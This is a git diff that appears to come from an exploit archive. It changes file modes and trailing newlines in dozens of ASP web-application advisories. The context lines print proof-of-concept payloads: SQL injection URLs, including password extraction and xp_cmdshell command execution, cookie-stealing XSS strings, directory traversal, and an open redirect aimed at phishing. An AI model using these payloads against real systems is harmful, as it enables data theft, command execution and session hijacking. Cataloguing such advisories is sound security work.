\ No newline at end of file diff --git a/platforms/asp/webapps/23440.txt b/platforms/asp/webapps/23440.txt old mode 100755 new mode 100644 index 1f3afdaa4..f3e62b017 --- a/platforms/asp/webapps/23440.txt +++ b/platforms/asp/webapps/23440.txt @@ -9,4 +9,4 @@ These issues are currently undergoing further analysis. http://www.example.com/templates/Page.aspx?id=20691 http://www.example.com/news.asp?id=7661 http://www.example.com/system/linkurl.asp?root=../../../ -http://www.example.com/templates/CommonPage____19461.asp \ No newline at end of file +http://www.example.com/templates/CommonPage____19461.asp \ No newline at end of file diff --git a/platforms/asp/webapps/23515.txt b/platforms/asp/webapps/23515.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23516.txt b/platforms/asp/webapps/23516.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23547.txt b/platforms/asp/webapps/23547.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23561.txt b/platforms/asp/webapps/23561.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23571.txt b/platforms/asp/webapps/23571.txt old mode 100755 new mode 100644 index 9752caf20..0ea155acd --- a/platforms/asp/webapps/23571.txt +++ b/platforms/asp/webapps/23571.txt @@ -26,4 +26,4 @@ or http://survey.site.com/UploadImagePopup.aspx ####################################################### -Greetz : Matlo3a-Dz \ No newline at end of file +Greetz : Matlo3a-Dz \ No newline at end of file diff --git a/platforms/asp/webapps/2362.txt b/platforms/asp/webapps/2362.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23635.txt b/platforms/asp/webapps/23635.txt old mode 100755 new mode 100644 index 3acdb8968..3603ed0c7 --- a/platforms/asp/webapps/23635.txt +++ b/platforms/asp/webapps/23635.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9555/info The showcode.asp script activated in Sample_showcode.html may be vulnerable to a directory traversal issue. A remote attacker may view any files readable by the web server using '../' escape sequences in URI requests. -http://www.example.org/sample_script_directory/Sample_showcode.html?fname=/../../../../target \ No newline at end of file +http://www.example.org/sample_script_directory/Sample_showcode.html?fname=/../../../../target \ No newline at end of file diff --git a/platforms/asp/webapps/23676.txt b/platforms/asp/webapps/23676.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23677.txt b/platforms/asp/webapps/23677.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23702.txt b/platforms/asp/webapps/23702.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23703.txt b/platforms/asp/webapps/23703.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23704.txt b/platforms/asp/webapps/23704.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2371.txt b/platforms/asp/webapps/2371.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23729.txt b/platforms/asp/webapps/23729.txt old mode 100755 new mode 100644 index 3aa2771e5..69e67f4fd --- a/platforms/asp/webapps/23729.txt +++ b/platforms/asp/webapps/23729.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9693/info It has been reported that WebStores2000 is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. -http://www.example.com/error.asp?Message_id=35 \ No newline at end of file +http://www.example.com/error.asp?Message_id=35 \ No newline at end of file diff --git a/platforms/asp/webapps/23791.txt b/platforms/asp/webapps/23791.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23813.txt b/platforms/asp/webapps/23813.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2384.txt b/platforms/asp/webapps/2384.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2385.txt b/platforms/asp/webapps/2385.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23851.txt b/platforms/asp/webapps/23851.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23852.txt b/platforms/asp/webapps/23852.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23853.txt b/platforms/asp/webapps/23853.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23854.txt b/platforms/asp/webapps/23854.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23857.txt b/platforms/asp/webapps/23857.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23858.txt b/platforms/asp/webapps/23858.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23859.txt b/platforms/asp/webapps/23859.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2386.txt b/platforms/asp/webapps/2386.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23860.txt b/platforms/asp/webapps/23860.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23861.txt b/platforms/asp/webapps/23861.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23862.txt b/platforms/asp/webapps/23862.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23863.txt b/platforms/asp/webapps/23863.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2387.txt b/platforms/asp/webapps/2387.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23891.txt b/platforms/asp/webapps/23891.txt old mode 100755 new mode 100644 index 705140361..c477ea24c --- a/platforms/asp/webapps/23891.txt +++ b/platforms/asp/webapps/23891.txt @@ -7,4 +7,4 @@ The SQL injection issue may allow a remote attacker to manipulate SQL query logi The cross-site scripting issue could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks. http://www.example.com/category.asp?catcode=[SqlInjection] -http://www.example.com/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='[Username]' \ No newline at end of file +http://www.example.com/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='[Username]' \ No newline at end of file diff --git a/platforms/asp/webapps/23895.txt b/platforms/asp/webapps/23895.txt old mode 100755 new mode 100644 index 2919d1327..52d38127c --- a/platforms/asp/webapps/23895.txt +++ b/platforms/asp/webapps/23895.txt @@ -4,4 +4,4 @@ It has been reported that Interchange may be prone to a remote information discl This issue may allow an attacker to gain access to sensitive information that may be used to launch further attacks against a system. -http://www.example.com/cgi-bin/store/__SQLUSER__ \ No newline at end of file +http://www.example.com/cgi-bin/store/__SQLUSER__ \ No newline at end of file diff --git a/platforms/asp/webapps/23898.txt b/platforms/asp/webapps/23898.txt old mode 100755 new mode 100644 index 9addf52ab..7567e6053 --- a/platforms/asp/webapps/23898.txt +++ b/platforms/asp/webapps/23898.txt @@ -6,4 +6,4 @@ As a result of this, a malicious user may influence database queries in order to http://www.example.com/payonline.asp/strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed -http://www.example.com/payonline.asp/strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed \ No newline at end of file +http://www.example.com/payonline.asp/strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed \ No newline at end of file diff --git a/platforms/asp/webapps/23899.txt b/platforms/asp/webapps/23899.txt old mode 100755 new mode 100644 index e6f29ddda..b53fe8ad1 --- a/platforms/asp/webapps/23899.txt +++ b/platforms/asp/webapps/23899.txt @@ -6,4 +6,4 @@ This issue could permit a remote attacker to create a malicious link to the vuln http://www.example.com/popuplargeimage.asp?strImageTag= -http://www.example.com/popuplargeimage.asp?strImageTag= \ No newline at end of file +http://www.example.com/popuplargeimage.asp?strImageTag= \ No newline at end of file diff --git a/platforms/asp/webapps/2395.txt b/platforms/asp/webapps/2395.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23968.txt b/platforms/asp/webapps/23968.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24039.txt b/platforms/asp/webapps/24039.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24049.txt b/platforms/asp/webapps/24049.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2416.txt b/platforms/asp/webapps/2416.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24184.txt b/platforms/asp/webapps/24184.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24185.txt b/platforms/asp/webapps/24185.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24198.txt b/platforms/asp/webapps/24198.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24214.txt b/platforms/asp/webapps/24214.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2423.txt b/platforms/asp/webapps/2423.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24260.txt b/platforms/asp/webapps/24260.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24261.txt b/platforms/asp/webapps/24261.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24313.txt b/platforms/asp/webapps/24313.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24314.txt b/platforms/asp/webapps/24314.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24315.txt b/platforms/asp/webapps/24315.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24316.txt b/platforms/asp/webapps/24316.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24317.txt b/platforms/asp/webapps/24317.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24368.txt b/platforms/asp/webapps/24368.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24369.txt b/platforms/asp/webapps/24369.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24370.txt b/platforms/asp/webapps/24370.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24371.txt b/platforms/asp/webapps/24371.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24385.txt b/platforms/asp/webapps/24385.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24397.txt b/platforms/asp/webapps/24397.txt old mode 100755 new mode 100644 index 941733c69..9401a197c --- a/platforms/asp/webapps/24397.txt +++ b/platforms/asp/webapps/24397.txt @@ -7,4 +7,4 @@ CNU5 version 1.2 is reported vulnerable to this issue. CNU5 Extra may be affecte This issue is being retired due to the fact that this is not a vulnerability in the application. Configuring the Web server to restrict access to sensitive files can prevent this problem. http://www.example.com/news/news.mdb -http://www.example.com/news.mdb \ No newline at end of file +http://www.example.com/news.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/24420.txt b/platforms/asp/webapps/24420.txt old mode 100755 new mode 100644 index 562680160..9128e9b40 --- a/platforms/asp/webapps/24420.txt +++ b/platforms/asp/webapps/24420.txt @@ -16,4 +16,4 @@ Cross-site scripting: /adminSection/index.asp?ShowMsg=(XSS) /adminSection/ChangePassword.asp?ShowMsg=(XSS) /adminSection/users_list.asp?ShowMsg=(XSS) -/adminSection/users_add.asp?ShowMsg=(XSS) \ No newline at end of file +/adminSection/users_add.asp?ShowMsg=(XSS) \ No newline at end of file diff --git a/platforms/asp/webapps/24422.txt b/platforms/asp/webapps/24422.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24588.txt b/platforms/asp/webapps/24588.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24589.txt b/platforms/asp/webapps/24589.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24604.txt b/platforms/asp/webapps/24604.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24625.txt b/platforms/asp/webapps/24625.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24626.txt b/platforms/asp/webapps/24626.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24631.txt b/platforms/asp/webapps/24631.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24632.txt b/platforms/asp/webapps/24632.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24633.txt b/platforms/asp/webapps/24633.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24666.txt b/platforms/asp/webapps/24666.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24670.txt b/platforms/asp/webapps/24670.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24671.txt b/platforms/asp/webapps/24671.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24672.txt b/platforms/asp/webapps/24672.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24673.txt b/platforms/asp/webapps/24673.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24674.txt b/platforms/asp/webapps/24674.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24675.txt b/platforms/asp/webapps/24675.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24717.txt b/platforms/asp/webapps/24717.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24838.txt b/platforms/asp/webapps/24838.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/24840.txt b/platforms/asp/webapps/24840.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25060.txt b/platforms/asp/webapps/25060.txt old mode 100755 new mode 100644 index 1bb2d7340..98d1f4b16 --- a/platforms/asp/webapps/25060.txt +++ b/platforms/asp/webapps/25060.txt @@ -9,4 +9,4 @@ http://www.example.com/comersus/backofficelite/comersus_backofficelite_supportEr The following proof of concept is available for the SQL injection issue: GET /comersus/store/default.asp HTTP/1.1 -Referer: \ No newline at end of file +Referer: \ No newline at end of file diff --git a/platforms/asp/webapps/25078.txt b/platforms/asp/webapps/25078.txt old mode 100755 new mode 100644 index 1309be7bc..dd69f1bf3 --- a/platforms/asp/webapps/25078.txt +++ b/platforms/asp/webapps/25078.txt @@ -5,4 +5,4 @@ Reportedly Eurofull E-Commerce is affected by a cross-site scripting vulnerabili As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. http://www.example.com/shop/mensresp.asp?recomend=1&nombre=(CODE)&email= -http://www.example.com/shop/mensresp.asp?recomend=1&nombre=%3Cscript%3Ealert('discovery_by_snilabs')%3C/script%3E&email=&email= \ No newline at end of file +http://www.example.com/shop/mensresp.asp?recomend=1&nombre=%3Cscript%3Ealert('discovery_by_snilabs')%3C/script%3E&email=&email= \ No newline at end of file diff --git a/platforms/asp/webapps/25084.txt b/platforms/asp/webapps/25084.txt old mode 100755 new mode 100644 index 61b47dcbe..e23e986bb --- a/platforms/asp/webapps/25084.txt +++ b/platforms/asp/webapps/25084.txt @@ -5,4 +5,4 @@ A remote URI-redirection vulnerability affects Microsoft Outlook Web Access. Thi An attacker may leverage this issue to carry out convincing phishing attacks against unsuspecting users by causing an arbitrary page to be loaded when the Microsoft Outlook Web Access login form is submitted. https://owa.example.com/exchweb/bin/auth/owalogon.asp?url=http://www.example.net -https://owa.example.com/exchweb/bin/auth/owalogon.asp?url=http://3221234342/ \ No newline at end of file +https://owa.example.com/exchweb/bin/auth/owalogon.asp?url=http://3221234342/ \ No newline at end of file diff --git a/platforms/asp/webapps/25110.txt b/platforms/asp/webapps/25110.txt old mode 100755 new mode 100644 index 619454050..f3a828ddf --- a/platforms/asp/webapps/25110.txt +++ b/platforms/asp/webapps/25110.txt @@ -6,4 +6,4 @@ Apparently, the application fails to properly validate Unicode characters allowi This can facilitate theft of cookie-based credentials and other attacks. -http://www.example.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e \ No newline at end of file +http://www.example.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e \ No newline at end of file diff --git a/platforms/asp/webapps/25148.txt b/platforms/asp/webapps/25148.txt old mode 100755 new mode 100644 index 1941e15bc..80356522e --- a/platforms/asp/webapps/25148.txt +++ b/platforms/asp/webapps/25148.txt @@ -4,4 +4,4 @@ It is reported that Mono is prone to various cross-site scripting attacks. These Mono 1.0.5 is reported vulnerable, however, other versions may be affected as well. -http://www.example.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e \ No newline at end of file +http://www.example.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e \ No newline at end of file diff --git a/platforms/asp/webapps/25233.txt b/platforms/asp/webapps/25233.txt old mode 100755 new mode 100644 index 437739d2b..bb7cf0310 --- a/platforms/asp/webapps/25233.txt +++ b/platforms/asp/webapps/25233.txt @@ -4,4 +4,4 @@ ACS Blog is reportedly affected by a cross-site scripting vulnerability. This is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com//search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E \ No newline at end of file +http://www.example.com//search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25252.txt b/platforms/asp/webapps/25252.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25253.txt b/platforms/asp/webapps/25253.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25254.txt b/platforms/asp/webapps/25254.txt old mode 100755 new mode 100644 index 951339c33..f72f6bc60 --- a/platforms/asp/webapps/25254.txt +++ b/platforms/asp/webapps/25254.txt @@ -10,4 +10,4 @@ It is reported that several betaparticle blog scripts may be accessed by a remot It is reported that these scripts may be leveraged on betaparticle blog versions up to and including version 3.0. -http://www.example.com/bp/myFiles.asp \ No newline at end of file +http://www.example.com/bp/myFiles.asp \ No newline at end of file diff --git a/platforms/asp/webapps/25313.txt b/platforms/asp/webapps/25313.txt old mode 100755 new mode 100644 index 9dbf11a66..fed6f5e64 --- a/platforms/asp/webapps/25313.txt +++ b/platforms/asp/webapps/25313.txt @@ -4,4 +4,4 @@ ACS Blog is affected by an HTML injection vulnerability. The issue affects the 'Name' field and may be exploited to execute arbitrary HTML and script code in the browser of the user when the user views an affected Web page. -Name: <script>alert("xss");</script> \ No newline at end of file +Name: <script>alert("xss");</script> \ No newline at end of file diff --git a/platforms/asp/webapps/25318.txt b/platforms/asp/webapps/25318.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25324.txt b/platforms/asp/webapps/25324.txt old mode 100755 new mode 100644 index d140837f7..c496c9482 --- a/platforms/asp/webapps/25324.txt +++ b/platforms/asp/webapps/25324.txt @@ -6,4 +6,4 @@ An attacker can supply arbitrary HTML and script code through the BBCode IMG tag XM Forum RC3 is reported vulnerable. It is possible that other versions are affected as well. -[IMG]javasc+ript:alert(document.cookie)[/IMG] \ No newline at end of file +[IMG]javasc+ript:alert(document.cookie)[/IMG] \ No newline at end of file diff --git a/platforms/asp/webapps/25332.txt b/platforms/asp/webapps/25332.txt old mode 100755 new mode 100644 index bfafd3fe4..3f40b3288 --- a/platforms/asp/webapps/25332.txt +++ b/platforms/asp/webapps/25332.txt @@ -8,4 +8,4 @@ Successful exploitation could result in a compromise of the application, disclos All versions of SiteEnable are considered vulnerable at the moment. -http://www.example.com/content.asp?do_search=0&keywords=contact&page_no=2&sortby=;SELECT%20* FROM bla bla-- \ No newline at end of file +http://www.example.com/content.asp?do_search=0&keywords=contact&page_no=2&sortby=;SELECT%20* FROM bla bla-- \ No newline at end of file diff --git a/platforms/asp/webapps/25346.txt b/platforms/asp/webapps/25346.txt old mode 100755 new mode 100644 index bee3e286c..3084cd1e9 --- a/platforms/asp/webapps/25346.txt +++ b/platforms/asp/webapps/25346.txt @@ -5,4 +5,4 @@ Active Auction House is reportedly affected by multiple SQL injection vulnerabil Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION -http://www.example.com/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION \ No newline at end of file +http://www.example.com/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25347.txt b/platforms/asp/webapps/25347.txt old mode 100755 new mode 100644 index c46060213..82a0813a2 --- a/platforms/asp/webapps/25347.txt +++ b/platforms/asp/webapps/25347.txt @@ -4,4 +4,4 @@ Active Auction House is reportedly affected by a SQL injection vulnerability. Th Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION \ No newline at end of file +http://www.example.com/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25348.txt b/platforms/asp/webapps/25348.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25349.txt b/platforms/asp/webapps/25349.txt old mode 100755 new mode 100644 index a27693a9c..e41070d6b --- a/platforms/asp/webapps/25349.txt +++ b/platforms/asp/webapps/25349.txt @@ -4,4 +4,4 @@ Active Auction House is reportedly affected by multiple cross-site scripting vul An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25351.txt b/platforms/asp/webapps/25351.txt old mode 100755 new mode 100644 index 019632928..aacceec7b --- a/platforms/asp/webapps/25351.txt +++ b/platforms/asp/webapps/25351.txt @@ -5,4 +5,4 @@ Active Auction House is reportedly affected by multiple cross-site scripting vul An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title="><script>alert(document.cookie)</script> -http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account \ No newline at end of file +http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account \ No newline at end of file diff --git a/platforms/asp/webapps/25352.txt b/platforms/asp/webapps/25352.txt old mode 100755 new mode 100644 index 22d455eb3..d0b7ee19b --- a/platforms/asp/webapps/25352.txt +++ b/platforms/asp/webapps/25352.txt @@ -4,4 +4,4 @@ Active Auction House is reportedly affected by a cross-site scripting vulnerabil An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&%3baccountid= \ No newline at end of file +http://www.example.com/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&%3baccountid= \ No newline at end of file diff --git a/platforms/asp/webapps/25390.txt b/platforms/asp/webapps/25390.txt old mode 100755 new mode 100644 index 9d588fed2..72ac935e4 --- a/platforms/asp/webapps/25390.txt +++ b/platforms/asp/webapps/25390.txt @@ -4,4 +4,4 @@ Comersus Cart is affected by a cross-site scripting vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/comersus_searchItem.asp?strSearch=0&curPage=2">%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/store/comersus_searchItem.asp?strSearch=0&curPage=2">%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25424.txt b/platforms/asp/webapps/25424.txt old mode 100755 new mode 100644 index 2ccb6a34b..cc59c9b4f --- a/platforms/asp/webapps/25424.txt +++ b/platforms/asp/webapps/25424.txt @@ -4,4 +4,4 @@ OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION \ No newline at end of file +http://www.example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25425.txt b/platforms/asp/webapps/25425.txt old mode 100755 new mode 100644 index e8ff2066e..c3ef7fe43 --- a/platforms/asp/webapps/25425.txt +++ b/platforms/asp/webapps/25425.txt @@ -5,4 +5,4 @@ OneWorldStore is prone to multiple SQL injection vulnerabilities. These issues a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/owListProduct.asp?bSpecials='SQL_INJECTION -http://www.example.com/owListProduct.asp?idCategory='SQL_INJECTION \ No newline at end of file +http://www.example.com/owListProduct.asp?idCategory='SQL_INJECTION \ No newline at end of file diff --git a/platforms/asp/webapps/25426.txt b/platforms/asp/webapps/25426.txt old mode 100755 new mode 100644 index a55291f9c..e83db4364 --- a/platforms/asp/webapps/25426.txt +++ b/platforms/asp/webapps/25426.txt @@ -5,4 +5,4 @@ OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/owProductDetail.asp?idProduct='SQL_INJECTION -http://www.example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab \ No newline at end of file +http://www.example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab \ No newline at end of file diff --git a/platforms/asp/webapps/25427.txt b/platforms/asp/webapps/25427.txt old mode 100755 new mode 100644 index da28a2ca0..e6d10e69a --- a/platforms/asp/webapps/25427.txt +++ b/platforms/asp/webapps/25427.txt @@ -4,4 +4,4 @@ OneWorldStore is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab \ No newline at end of file +http://www.example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab \ No newline at end of file diff --git a/platforms/asp/webapps/25428.txt b/platforms/asp/webapps/25428.txt old mode 100755 new mode 100644 index 254117307..087f7f1e8 --- a/platforms/asp/webapps/25428.txt +++ b/platforms/asp/webapps/25428.txt @@ -4,4 +4,4 @@ OneWorldStore is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64 \ No newline at end of file +http://www.example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64 \ No newline at end of file diff --git a/platforms/asp/webapps/25455.txt b/platforms/asp/webapps/25455.txt old mode 100755 new mode 100644 index 1878136e5..6a6f60bc0 --- a/platforms/asp/webapps/25455.txt +++ b/platforms/asp/webapps/25455.txt @@ -4,4 +4,4 @@ OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/owSearch/DisplayResults.asp?sIDSearch=15%20or%201=1 \ No newline at end of file +http://www.example.com/owSearch/DisplayResults.asp?sIDSearch=15%20or%201=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25456.txt b/platforms/asp/webapps/25456.txt old mode 100755 new mode 100644 index 156f8ff58..0ed1628ec --- a/platforms/asp/webapps/25456.txt +++ b/platforms/asp/webapps/25456.txt @@ -5,4 +5,4 @@ OneWorldStore is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 